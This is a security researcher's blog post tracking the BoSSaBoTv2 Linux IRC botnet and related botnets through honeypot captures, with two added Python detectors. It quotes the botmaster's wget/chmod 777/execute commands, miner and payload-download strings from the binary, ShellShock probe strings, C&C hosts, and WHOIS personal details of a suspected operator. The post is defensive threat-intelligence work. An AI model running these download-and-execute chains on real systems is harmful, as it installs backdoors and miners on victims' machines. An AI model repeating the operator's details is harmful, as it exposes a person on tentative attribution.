BoSSaBoTv2: another Linux IRC backdoor

Today I was looking at my web honeypot and this one caught my attention: https://www.malekal.com/modsec/index.php?ip=178.32.59.202
This PHP vulnerability is widely exploited (I already wrote about it: https://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ), but it was the first time I saw this base64-decoded code.

The code leads to haxmeup.uni.me (192.95.12.34, OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expected the usual PHP shellbot, but this time it was a FUD (fully undetected) binary: https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

So I launched it:

[screenshot: BoSSaBoTv2_modsec]
[screenshot: BoSSaBoTv2_ircbackdoor]

It made a connection to 37.59.74.161 (OVH again) on port 8067; there is an IRCd behind it:

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

So, an IRC backdoor.

[screenshot: BoSSaBoTv2_ircbackdoor2]
Another surprise: the IRCd does not have any mode set to hide users, etc.
~40 bots, not that many.
So let’s play.
[screenshot: BoSSaBoTv2_ircbackdoor3]

In the screenshot below, we can see that the botmaster launches an IP range scan, then some bots exploit some servers.
We can see that the exploit at 200.185.236.85 was successful because it joins the channel as a new bot.
[screenshot: BoSSaBoTv2_ircbackdoor4]
Confirmed by my VM.
We got another DNS name, con32.cz.cc, that resolves to the same IP, 192.95.12.34.
[screenshot: BoSSaBoTv2_ircbackdoor5]

Two new bots:

[screenshot: BoSSaBoTv2_ircbackdoor6]

The IRCd is new: around 40 bots in 9 days:

[screenshot: BoSSaBoTv2_ircbackdoor_ircd]

The botmaster regularly makes the bots download a new binary, all from www.bilder-upload.eu (which seems legitimate):

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab

Recap of hashes and hosts:
haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH)
haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
http://malwaredb.malekal.com/index.php?hash=b36de738b5a807529f343f25a8ace0e0
http://malwaredb.malekal.com/index.php?hash=e9bb00d0faea2529cd5cc64147affdc4

[screenshot: BoSSaBoTv2_md5]

Then I wrote a little script to send abuse emails; hopefully they will lose some bots 🙂

[screenshot: BoSSaBoTv2_abuse]

MalwareMustDie decompiled the binary; some strings: http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin mining capabilities:

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
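
As an added example (not code from the original post, nor from MalwareMustDie's analysis), here is a small Python detector for the command patterns quoted above: the "!BOSS* SH" download / chmod 777 / execute chain, and the minerd / stratum+tcp / cpuminer strings. It runs over constructed IRC channel log lines modelled on what the honeypot VM would see; the log format, the nick "b0ss" and the pool address are assumptions.

```python
"""Detect BoSSaBoT-style bot commands in IRC or honeypot logs.

Added example, not code from the original post or from MalwareMustDie.
The rules come from the command strings quoted in the post: the "!BOSS* SH"
prefix, wget into /tmp, chmod 777 of the dropped file, execution from /tmp,
and the minerd / stratum+tcp / cpuminer strings. The log lines, the channel
log format, the nick "b0ss" and the pool address are constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample channel log (assumed format: [time] <nick> message).
SAMPLE_LOG = """\
[10:47] <b0ss> !BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
[10:47] <b0ss> !BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
[10:47] <b0ss> !BOSS* SH chmod 777 /tmp/4L2nJG5Vab
[10:47] <b0ss> !BOSS* SH /tmp/4L2nJG5Vab
[10:52] <b0ss> !BOSS* SH /tmp/minerd -t 4 -o stratum+tcp://pool.example:3333 -O user:pass -q -B 2>/dev/null &
[10:53] <someone> hello, is this channel alive?
[10:55] <b0ss> !BOSS* SH wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
"""

# Everything after the bot's command prefix is the shell command it runs.
PREFIX = re.compile(r"!BOSS\*\s+SH\s+(.*)$")

# Substring rules checked on the whole line.
RULES = [
    ("bossabot_command_prefix", re.compile(r"!BOSS\*\s+SH\b")),
    ("download_to_tmp", re.compile(r"\bwget\b.*(?:-P\s+/tmp\b|-O\s+/tmp/)")),
    ("world_writable_tmp_binary", re.compile(r"\bchmod\s+777\s+/tmp/")),
    ("cpu_miner", re.compile(r"\bminerd\b|stratum\+tcp://|cpuminer")),
]


@dataclass
class Hit:
    line_no: int
    rules: list
    text: str


def shell_part(line):
    """The shell command carried by a bot line, or the whole line if there is no prefix."""
    m = PREFIX.search(line)
    return m.group(1) if m else line


def simple_commands(cmdline):
    """Split a shell line on ; && || | into its simple commands."""
    return [c.strip() for c in re.split(r";|&&|\|\||\|", cmdline) if c.strip()]


def executes_from_tmp(cmdline):
    """True if the program (first word) of any simple command lives under /tmp.

    Checking the command position avoids flagging 'mv /tmp/a /tmp/b' as execution."""
    for cmd in simple_commands(cmdline):
        words = cmd.split()
        if words and words[0].startswith("/tmp/"):
            return True
    return False


def analyze_log(text):
    """One Hit per line that triggers at least one rule, in line order."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        matched = [name for name, rx in RULES if rx.search(line)]
        if executes_from_tmp(shell_part(line)):
            matched.append("exec_from_tmp")
        if matched:
            hits.append(Hit(n, matched, line))
    return hits


def find_dropper_chains(hits, window=6):
    """(download, chmod 777, exec) line-number triples seen in that order within `window` lines.

    File paths are deliberately not tracked: the dropper renames the file between steps."""
    chains = []
    download = chmod = None
    for h in hits:
        if "download_to_tmp" in h.rules:
            download, chmod = h.line_no, None
        elif "world_writable_tmp_binary" in h.rules and download is not None:
            chmod = h.line_no
        elif "exec_from_tmp" in h.rules and chmod is not None:
            if h.line_no - download <= window:
                chains.append((download, chmod, h.line_no))
            download = chmod = None
    return chains


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {', '.join(h.rules)}")
    print("dropper chains (download, chmod, exec):", find_dropper_chains(hits))
```

On the sample, every bot line is flagged, the clean chat line is not, and the first four commands are reported as one download / chmod / execute chain; the later wget of cpuminer has no chmod and execute after it, so it is reported only by the miner rule.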

The most interesting one:

000000007E1D   BoSSaBoTv2-%s

A Google search turns up this topic on hackforums: http://www.hackforums.net/showthread.php?tid=4395309
According to the post date, the kit is new and the price is $100.

[screenshot: BoSSaBoTv2_ircbackdoor_disclosure]

EDIT – September 8

Back; lots of attacks this weekend:

https://www.malekal.com/modsec/index.php?ip=213.73.31.13
https://www.malekal.com/modsec/index.php?ip=195.154.140.251
https://www.malekal.com/modsec/index.php?ip=5.135.64.105
https://www.malekal.com/modsec/index.php?ip=46.105.230.91
https://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected:

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd: 23.95.10.101, port 53

[screenshot: BossaBot_comeback]

EDIT – September 21 2014: Two botnets

We found two different botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t.
The IRCd moved to IRC.DREAMBOXDB.COM (23.95.10.101:53/TCP) (binary: http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian:

[screenshot: IRCBot_sloboz_download]
[screenshot: IRCBot_sloboz_download2]

He makes the bots download a .tgz: http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A: https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/

[screenshot: IRCBot_sloboz]

It’s an IRC backdoor: it connects to the channels #linuxmafia and #m@trix on different IRCds, including the Undernet network.
We can see the master is imp / sloboz / demo, with an IP in the 23.* range (the same range as the BossaBackdoor C&C).

[screenshot: IRCBot_sloboz3]

[screenshot: IRCBot_sloboz2]


So I connected to Undernet, and the guy sloboz was also connected.
He uses the same IP as the BossaBackdoor C&C: 23.95.10.101

[screenshot: IRCBot_sloboz5]

[screenshot: IRCBot_sloboz4]

As you can see, there are some G-Lines resulting from virus detection; this is the .tgz IRC backdoor.

[screenshot: IRCBot_sloboz6]

I also found this old topic where someone claims his nickname was stolen on the Undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is: *** HeyHey is sloboz@86.104.220.177
The address belongs to a Romanian IP range.

According to this Urban Dictionary entry: http://www.urbandictionary.com/define.php?term=sloboz
There is also a city in Romania called Slobozia.

It seems he lost all his bots.

Very pleased to see that antivirus detection has improved for his binary: https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256: bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
File name: vti-rescan
Detection ratio: 16 / 53
Analysis date: 2014-09-15 09:55:35 UTC (6 days, 3 hours ago)
Antivirus  Result  Updated
Ad-Aware Backdoor.BossaBot.A 20140915
Avast ELF:BossaBot-A [Trj] 20140915
BitDefender Backdoor.BossaBot.A 20140915
DrWeb Linux.BackDoor.Irc.4 20140915
Emsisoft Backdoor.BossaBot.A (B) 20140915
F-Secure Backdoor.BossaBot.A 20140915
GData Backdoor.BossaBot.A 20140915
Ikarus Backdoor.BossaBot 20140915
Kaspersky HEUR:Backdoor.Linux.Bassobo.a 20140915
MicroWorld-eScan Backdoor.BossaBot.A 20140915
Norman BossaBot.A 20140914
Sophos Linux/BosaBot-A 20140915
Symantec Linux.Backdoor.Kaiten 20140915
Tencent Win32.Backdoor.Gen.Ugrc 20140915
TrendMicro-HouseCall ELF_BASSBOT.A 20140915
nProtect Backdoor.BossaBot.A 20140914

Snk / sult4n network

The second botnet: 2598 local users; if all of them are bots, that is not bad.
Notice the server name Sult4n.
[screenshot: Bossa_sult4n]

Binary: http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 ; C&C: SRV5050.CO, KA3EK.COM, IRCQFRUM.COM (1.34.224.120) and 8RB.SU (144.76.40.132)
All these domains are registered with the email address sullt4n@hotmail.com:

Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com


A look at Google turns up other old domains registered with the same IPs, used as C&C for a Windows IRC backdoor: zerx-virus.biz and x01bkr2.biz

  • April 2009: http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • March 2010: MSN worms: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013: http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was already well known to me, because I wrote it up in the context of Win32.Phorpiex, a Skype worm (in French): https://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAV, Urausy ransomware, Crypted ransomware, a spambot and other malware.
exposedbotnets.com calls him « Snk »: http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy has been very active for years!

EDIT – May 5 2015 : Comeback

Around April 15, new attacks to push some BossaBot.
Still PHP attacks:

[screenshot: BoSSaBot_April_2015]
and ShellShock attempts with two different URLs:

[screenshot: BoSSaBot_April_2015_attack2]
[screenshot: BoSSaBot_April_2015_attack]

IRCd:

[screenshot: BossaBot_ircd]

The domain is suspended: https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015: still active

Some days ago, I got this ShellShock attempt, but the link was not working.
I recognized the URL used by BossaBot.

[screenshot: ShellShock_BossaBot]

Today, more ShellShock attempts, all from OVH.
Here is the list:

37.59.149.136
91.121.4.163
94.23.248.135
94.23.63.125
188.165.210.224
94.23.20.161
188.165.245.68
188.165.220.171
188.165.253.55
94.23.4.99
188.165.237.170
91.121.199.85
91.121.47.52
91.121.223.149
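
As an added example (not from the original post), the Python below scans Apache combined-format access-log lines for the ShellShock signature, the "() {" Bash function-definition prefix in the User-Agent or Referer header (also in URL-encoded form), and counts hits per source IP so a list like the one above can be built from a log rather than by hand. The log lines are constructed: the source IPs are the ones listed above, while the timestamps, paths and the harmless "echo" payload are assumptions.

```python
"""Flag ShellShock probes in web-server access logs.

Added example, not code from the original post. It looks for the Bash
function-definition prefix "() {" that the ShellShock bug evaluated from
request headers, in the User-Agent and Referer fields of Apache
combined-format log lines, after URL-decoding. Sample lines are constructed:
the IPs are those listed in the post, everything else is made up.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: three probes (two plain, one URL-encoded), one clean
# request, and a repeat from the first source.
SAMPLE_LOG = """\
37.59.149.136 - - [24/Sep/2015:05:12:01 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo shellshock-test"
91.121.4.163 - - [24/Sep/2015:05:12:03 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 208 "() { :;}; echo probe" "Mozilla/5.0"
94.23.248.135 - - [24/Sep/2015:05:12:09 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe"
203.0.113.10 - - [24/Sep/2015:05:13:00 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
37.59.149.136 - - [24/Sep/2015:05:14:41 +0200] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; echo shellshock-test"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<user_agent>(?:[^"\\]|\\.)*)"'
)

# The ShellShock trigger: an exported function definition "() {" in a header
# value. Whitespace inside the parentheses and before the brace is tolerated.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")


def is_shellshock(value):
    """True if a header value carries the "() {" prefix, plain or URL-encoded."""
    return bool(SHELLSHOCK.search(unquote(value)))


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def scan(text):
    """One finding per probing header: {ip, field, path, value} in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else rec["request"]
        for field in ("user_agent", "referer"):
            if is_shellshock(rec[field]):
                findings.append({"ip": rec["ip"], "field": field,
                                 "path": path, "value": unquote(rec[field])})
    return findings


def count_by_source(findings):
    """Number of probing headers seen per source IP."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f'{f["ip"]:<16} {f["field"]:<10} {f["path"]:<20} {f["value"]}')
    print(count_by_source(found))
```

URL-decoding before matching matters: the third sample line carries the same prefix percent-encoded and would otherwise pass a plain substring check, while a normal browser User-Agent such as "Mozilla/5.0 (X11; Linux x86_64)" stays clean because its parentheses are never followed by a brace.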

[screenshot: ShellShock_BossaBot_3]

Also some PHP stuff, as before:

[screenshot: ShellShock_BossaBot_2]
The binaries are old, 5 months old:

https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/
https://www.virustotal.com/fr/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/1443073265/

but detection is still average:

SHA256: 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
File name: susu2
Detection ratio: 14 / 56
Analysis date: 2015-09-24 05:39:01 UTC (2 minutes ago)
Antivirus  Result  Updated
AVG Linux/Tsunami 20150924
AhnLab-V3 Linux/Ssabobot.B 20150923
Avast ELF:Tsunami-BH [Cryp] 20150924
CAT-QuickHeal Linux.Ropys.PR6b5 20150924
DrWeb Linux.BackDoor.Sessox.1 20150924
ESET-NOD32 a variant of Linux/Tsunami.NAL 20150924
GData Linux.Trojan.Agent.750WU5 20150924
Jiangmin Backdoor/Linux.oo 20150922
Kaspersky HEUR:Backdoor.Linux.Ropys.a 20150924
NANO-Antivirus Trojan.Unix.Ropys.drxdby 20150924
Sophos Mal/Generic-S 20150923
Symantec Linux.Susiribot 20150923
Tencent Linux.Backdoor.Ropys.Liha 20150924
Zillya Trojan.Tsunami.Linux.80 20150923

The IRCd is at 93.189.4.131:53 (Cloud-Servers).
Same IRCd modes as before.

[screenshot: ShellShock_BossaBot_4]

Going to ping some abuse contacts =)

EDIT – 6 October: still active

Still new binaries; MalwareMustDie also made an interesting tweet with an image link: http://t.co/OgNkLxSQGe

[screenshot: BossaBot_MalwareMustDie]
